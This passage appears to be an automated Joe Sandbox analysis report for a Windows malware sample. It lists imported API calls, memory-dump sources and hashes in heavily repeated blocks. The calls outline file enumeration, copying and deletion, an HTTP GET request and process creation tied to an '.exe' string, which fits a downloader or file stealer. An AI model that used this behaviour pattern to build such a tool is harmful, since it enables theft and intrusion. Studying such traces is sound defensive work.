                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 000966A7
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000B6B4C), ref: 000966C4
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 000966D7
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000B6B50), ref: 000966E9
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: wsprintfA.USER32 ref: 00096018
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: FindFirstFileA.KERNEL32(?,?), ref: 0009602F
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6AB4), ref: 00096050
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6AB8), ref: 0009606A
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: wsprintfA.USER32 ref: 00096091
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6647), ref: 000960A5
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: wsprintfA.USER32 ref: 000960C2
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 000960EF
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: lstrcatA.KERNEL32(?), ref: 00096125
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,000B6AD0), ref: 00096137
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,?), ref: 0009614A
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,000B6AD4), ref: 0009615C
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,?), ref: 00096170
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: wsprintfA.USER32 ref: 000960D9
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00096229
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: DeleteFileA.KERNEL32(?), ref: 0009629D
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: FindNextFileA.KERNEL32(?,?), ref: 000962FF
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: FindClose.KERNEL32(?), ref: 00096313
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2104210347-0
                                                                                                                                                                                                                                                    • Opcode ID: 68688ae5ad39a5978ffba808b0eca746f38d0d3c73ed5bd26a9e7787914a4489
                                                                                                                                                                                                                                                    • Instruction ID: e60108bdbc7dca95f9d7ac13649183912406d18ad2d5320f77fc3d34e73a870a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68688ae5ad39a5978ffba808b0eca746f38d0d3c73ed5bd26a9e7787914a4489
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA218E3590111CABCF50FB60EC4AED9B7B9EF14300F4140A2BA89A7291EFB59EC58F41
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,000B65B6,?,?,?), ref: 00090CD8
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00090CDF
                                                                                                                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00090CEB
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00090D16
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1243822799-0
                                                                                                                                                                                                                                                    • Opcode ID: 9202439d6efda61f8fdd8d2312affe53681badb84df9a39552026068e8476977
                                                                                                                                                                                                                                                    • Instruction ID: 4179d4b6a23a2a0eb53604932d98cd287aac44438df23b761a3cbb6b2e81fbde
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9202439d6efda61f8fdd8d2312affe53681badb84df9a39552026068e8476977
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85F031A1D01118BBDF50BFE5AC09ABF77BCAB0C755F410186F941E6180E6389E40D771
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(00094FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00094FAC,?), ref: 00092181
                                                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,00094FAC,?,?,?,00094FAC,?), ref: 00092199
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00094FAC,?), ref: 000921A4
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00094FAC,?), ref: 000921AC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseFileHandle$CreateSize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4148174661-0
                                                                                                                                                                                                                                                    • Opcode ID: 121f906e6f7229e960d9567aab851cfdf3967d9c8f472c419a35f9cf4cb468a0
                                                                                                                                                                                                                                                    • Instruction ID: 39cce8d831adc8cc7f0c514f1d3b9338c39ad83f8cca3f9b3cc1a308d5fe7eff
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 121f906e6f7229e960d9567aab851cfdf3967d9c8f472c419a35f9cf4cb468a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BAF0A731A42214FBFF60A7A0FC0DFDE7B6CEB14760F210211FA41AA1D0D7706E4096A4
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 00085237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0008527E
                                                                                                                                                                                                                                                      • Part of subcall function 00085237: RtlAllocateHeap.NTDLL(00000000), ref: 00085285
                                                                                                                                                                                                                                                      • Part of subcall function 00085237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 000852A7
                                                                                                                                                                                                                                                      • Part of subcall function 00085237: StrCmpCA.SHLWAPI(?), ref: 000852C1
                                                                                                                                                                                                                                                      • Part of subcall function 00085237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000852F1
                                                                                                                                                                                                                                                      • Part of subcall function 00085237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00085330
                                                                                                                                                                                                                                                      • Part of subcall function 00085237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00085360
                                                                                                                                                                                                                                                      • Part of subcall function 00085237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0008536B
                                                                                                                                                                                                                                                      • Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                      • Part of subcall function 00092446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00094A8D), ref: 00092460
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 00092CDF
                                                                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,000B6710), ref: 00092D31
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
                                                                                                                                                                                                                                                    • String ID: .exe
                                                                                                                                                                                                                                                    • API String ID: 2831197775-4119554291
                                                                                                                                                                                                                                                    • Opcode ID: 4dbe3808bb2ef7597c1ae3919be64870a1f984fa1e4062adad5b1efc0e1364bb
                                                                                                                                                                                                                                                    • Instruction ID: 75d2a6464489db6cfb1a44467ae6509e185cbdc45e73ef7177075a4ea7d18e89
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4dbe3808bb2ef7597c1ae3919be64870a1f984fa1e4062adad5b1efc0e1364bb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3413972A40118AFDF11BBA4EC42ADE77B8AF40304F110161FA94B7163DB70AE4A9BD1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00091DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00091DFD
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00096378
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00096396
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: wsprintfA.USER32 ref: 00096018
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: FindFirstFileA.KERNEL32(?,?), ref: 0009602F
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6AB4), ref: 00096050
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6AB8), ref: 0009606A
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: wsprintfA.USER32 ref: 00096091
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6647), ref: 000960A5
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: wsprintfA.USER32 ref: 000960C2
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 000960EF
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: lstrcatA.KERNEL32(?), ref: 00096125
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,000B6AD0), ref: 00096137
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,?), ref: 0009614A
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,000B6AD4), ref: 0009615C
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,?), ref: 00096170
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: wsprintfA.USER32 ref: 000960D9
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00096229
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: DeleteFileA.KERNEL32(?), ref: 0009629D
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: FindNextFileA.KERNEL32(?,?), ref: 000962FF
                                                                                                                                                                                                                                                      • Part of subcall function 00095FD1: FindClose.KERNEL32(?), ref: 00096313
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                    • String ID: nz
                                                                                                                                                                                                                                                    • API String ID: 2104210347-285480672
                                                                                                                                                                                                                                                    • Opcode ID: 4abdd7587dbf5400474f9d2da3666714aca39a05f22411cad2ddcf305df69391
                                                                                                                                                                                                                                                    • Instruction ID: 02c4d6b2256109e91c46bc91eab7332f06b5b8bed63bfa2ec0751ac43bd8e8c0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4abdd7587dbf5400474f9d2da3666714aca39a05f22411cad2ddcf305df69391
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1319E72D0100DAFDF01BB60EC46EE8777DFB08310F4504A6B609A7262EAB25E519F61
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
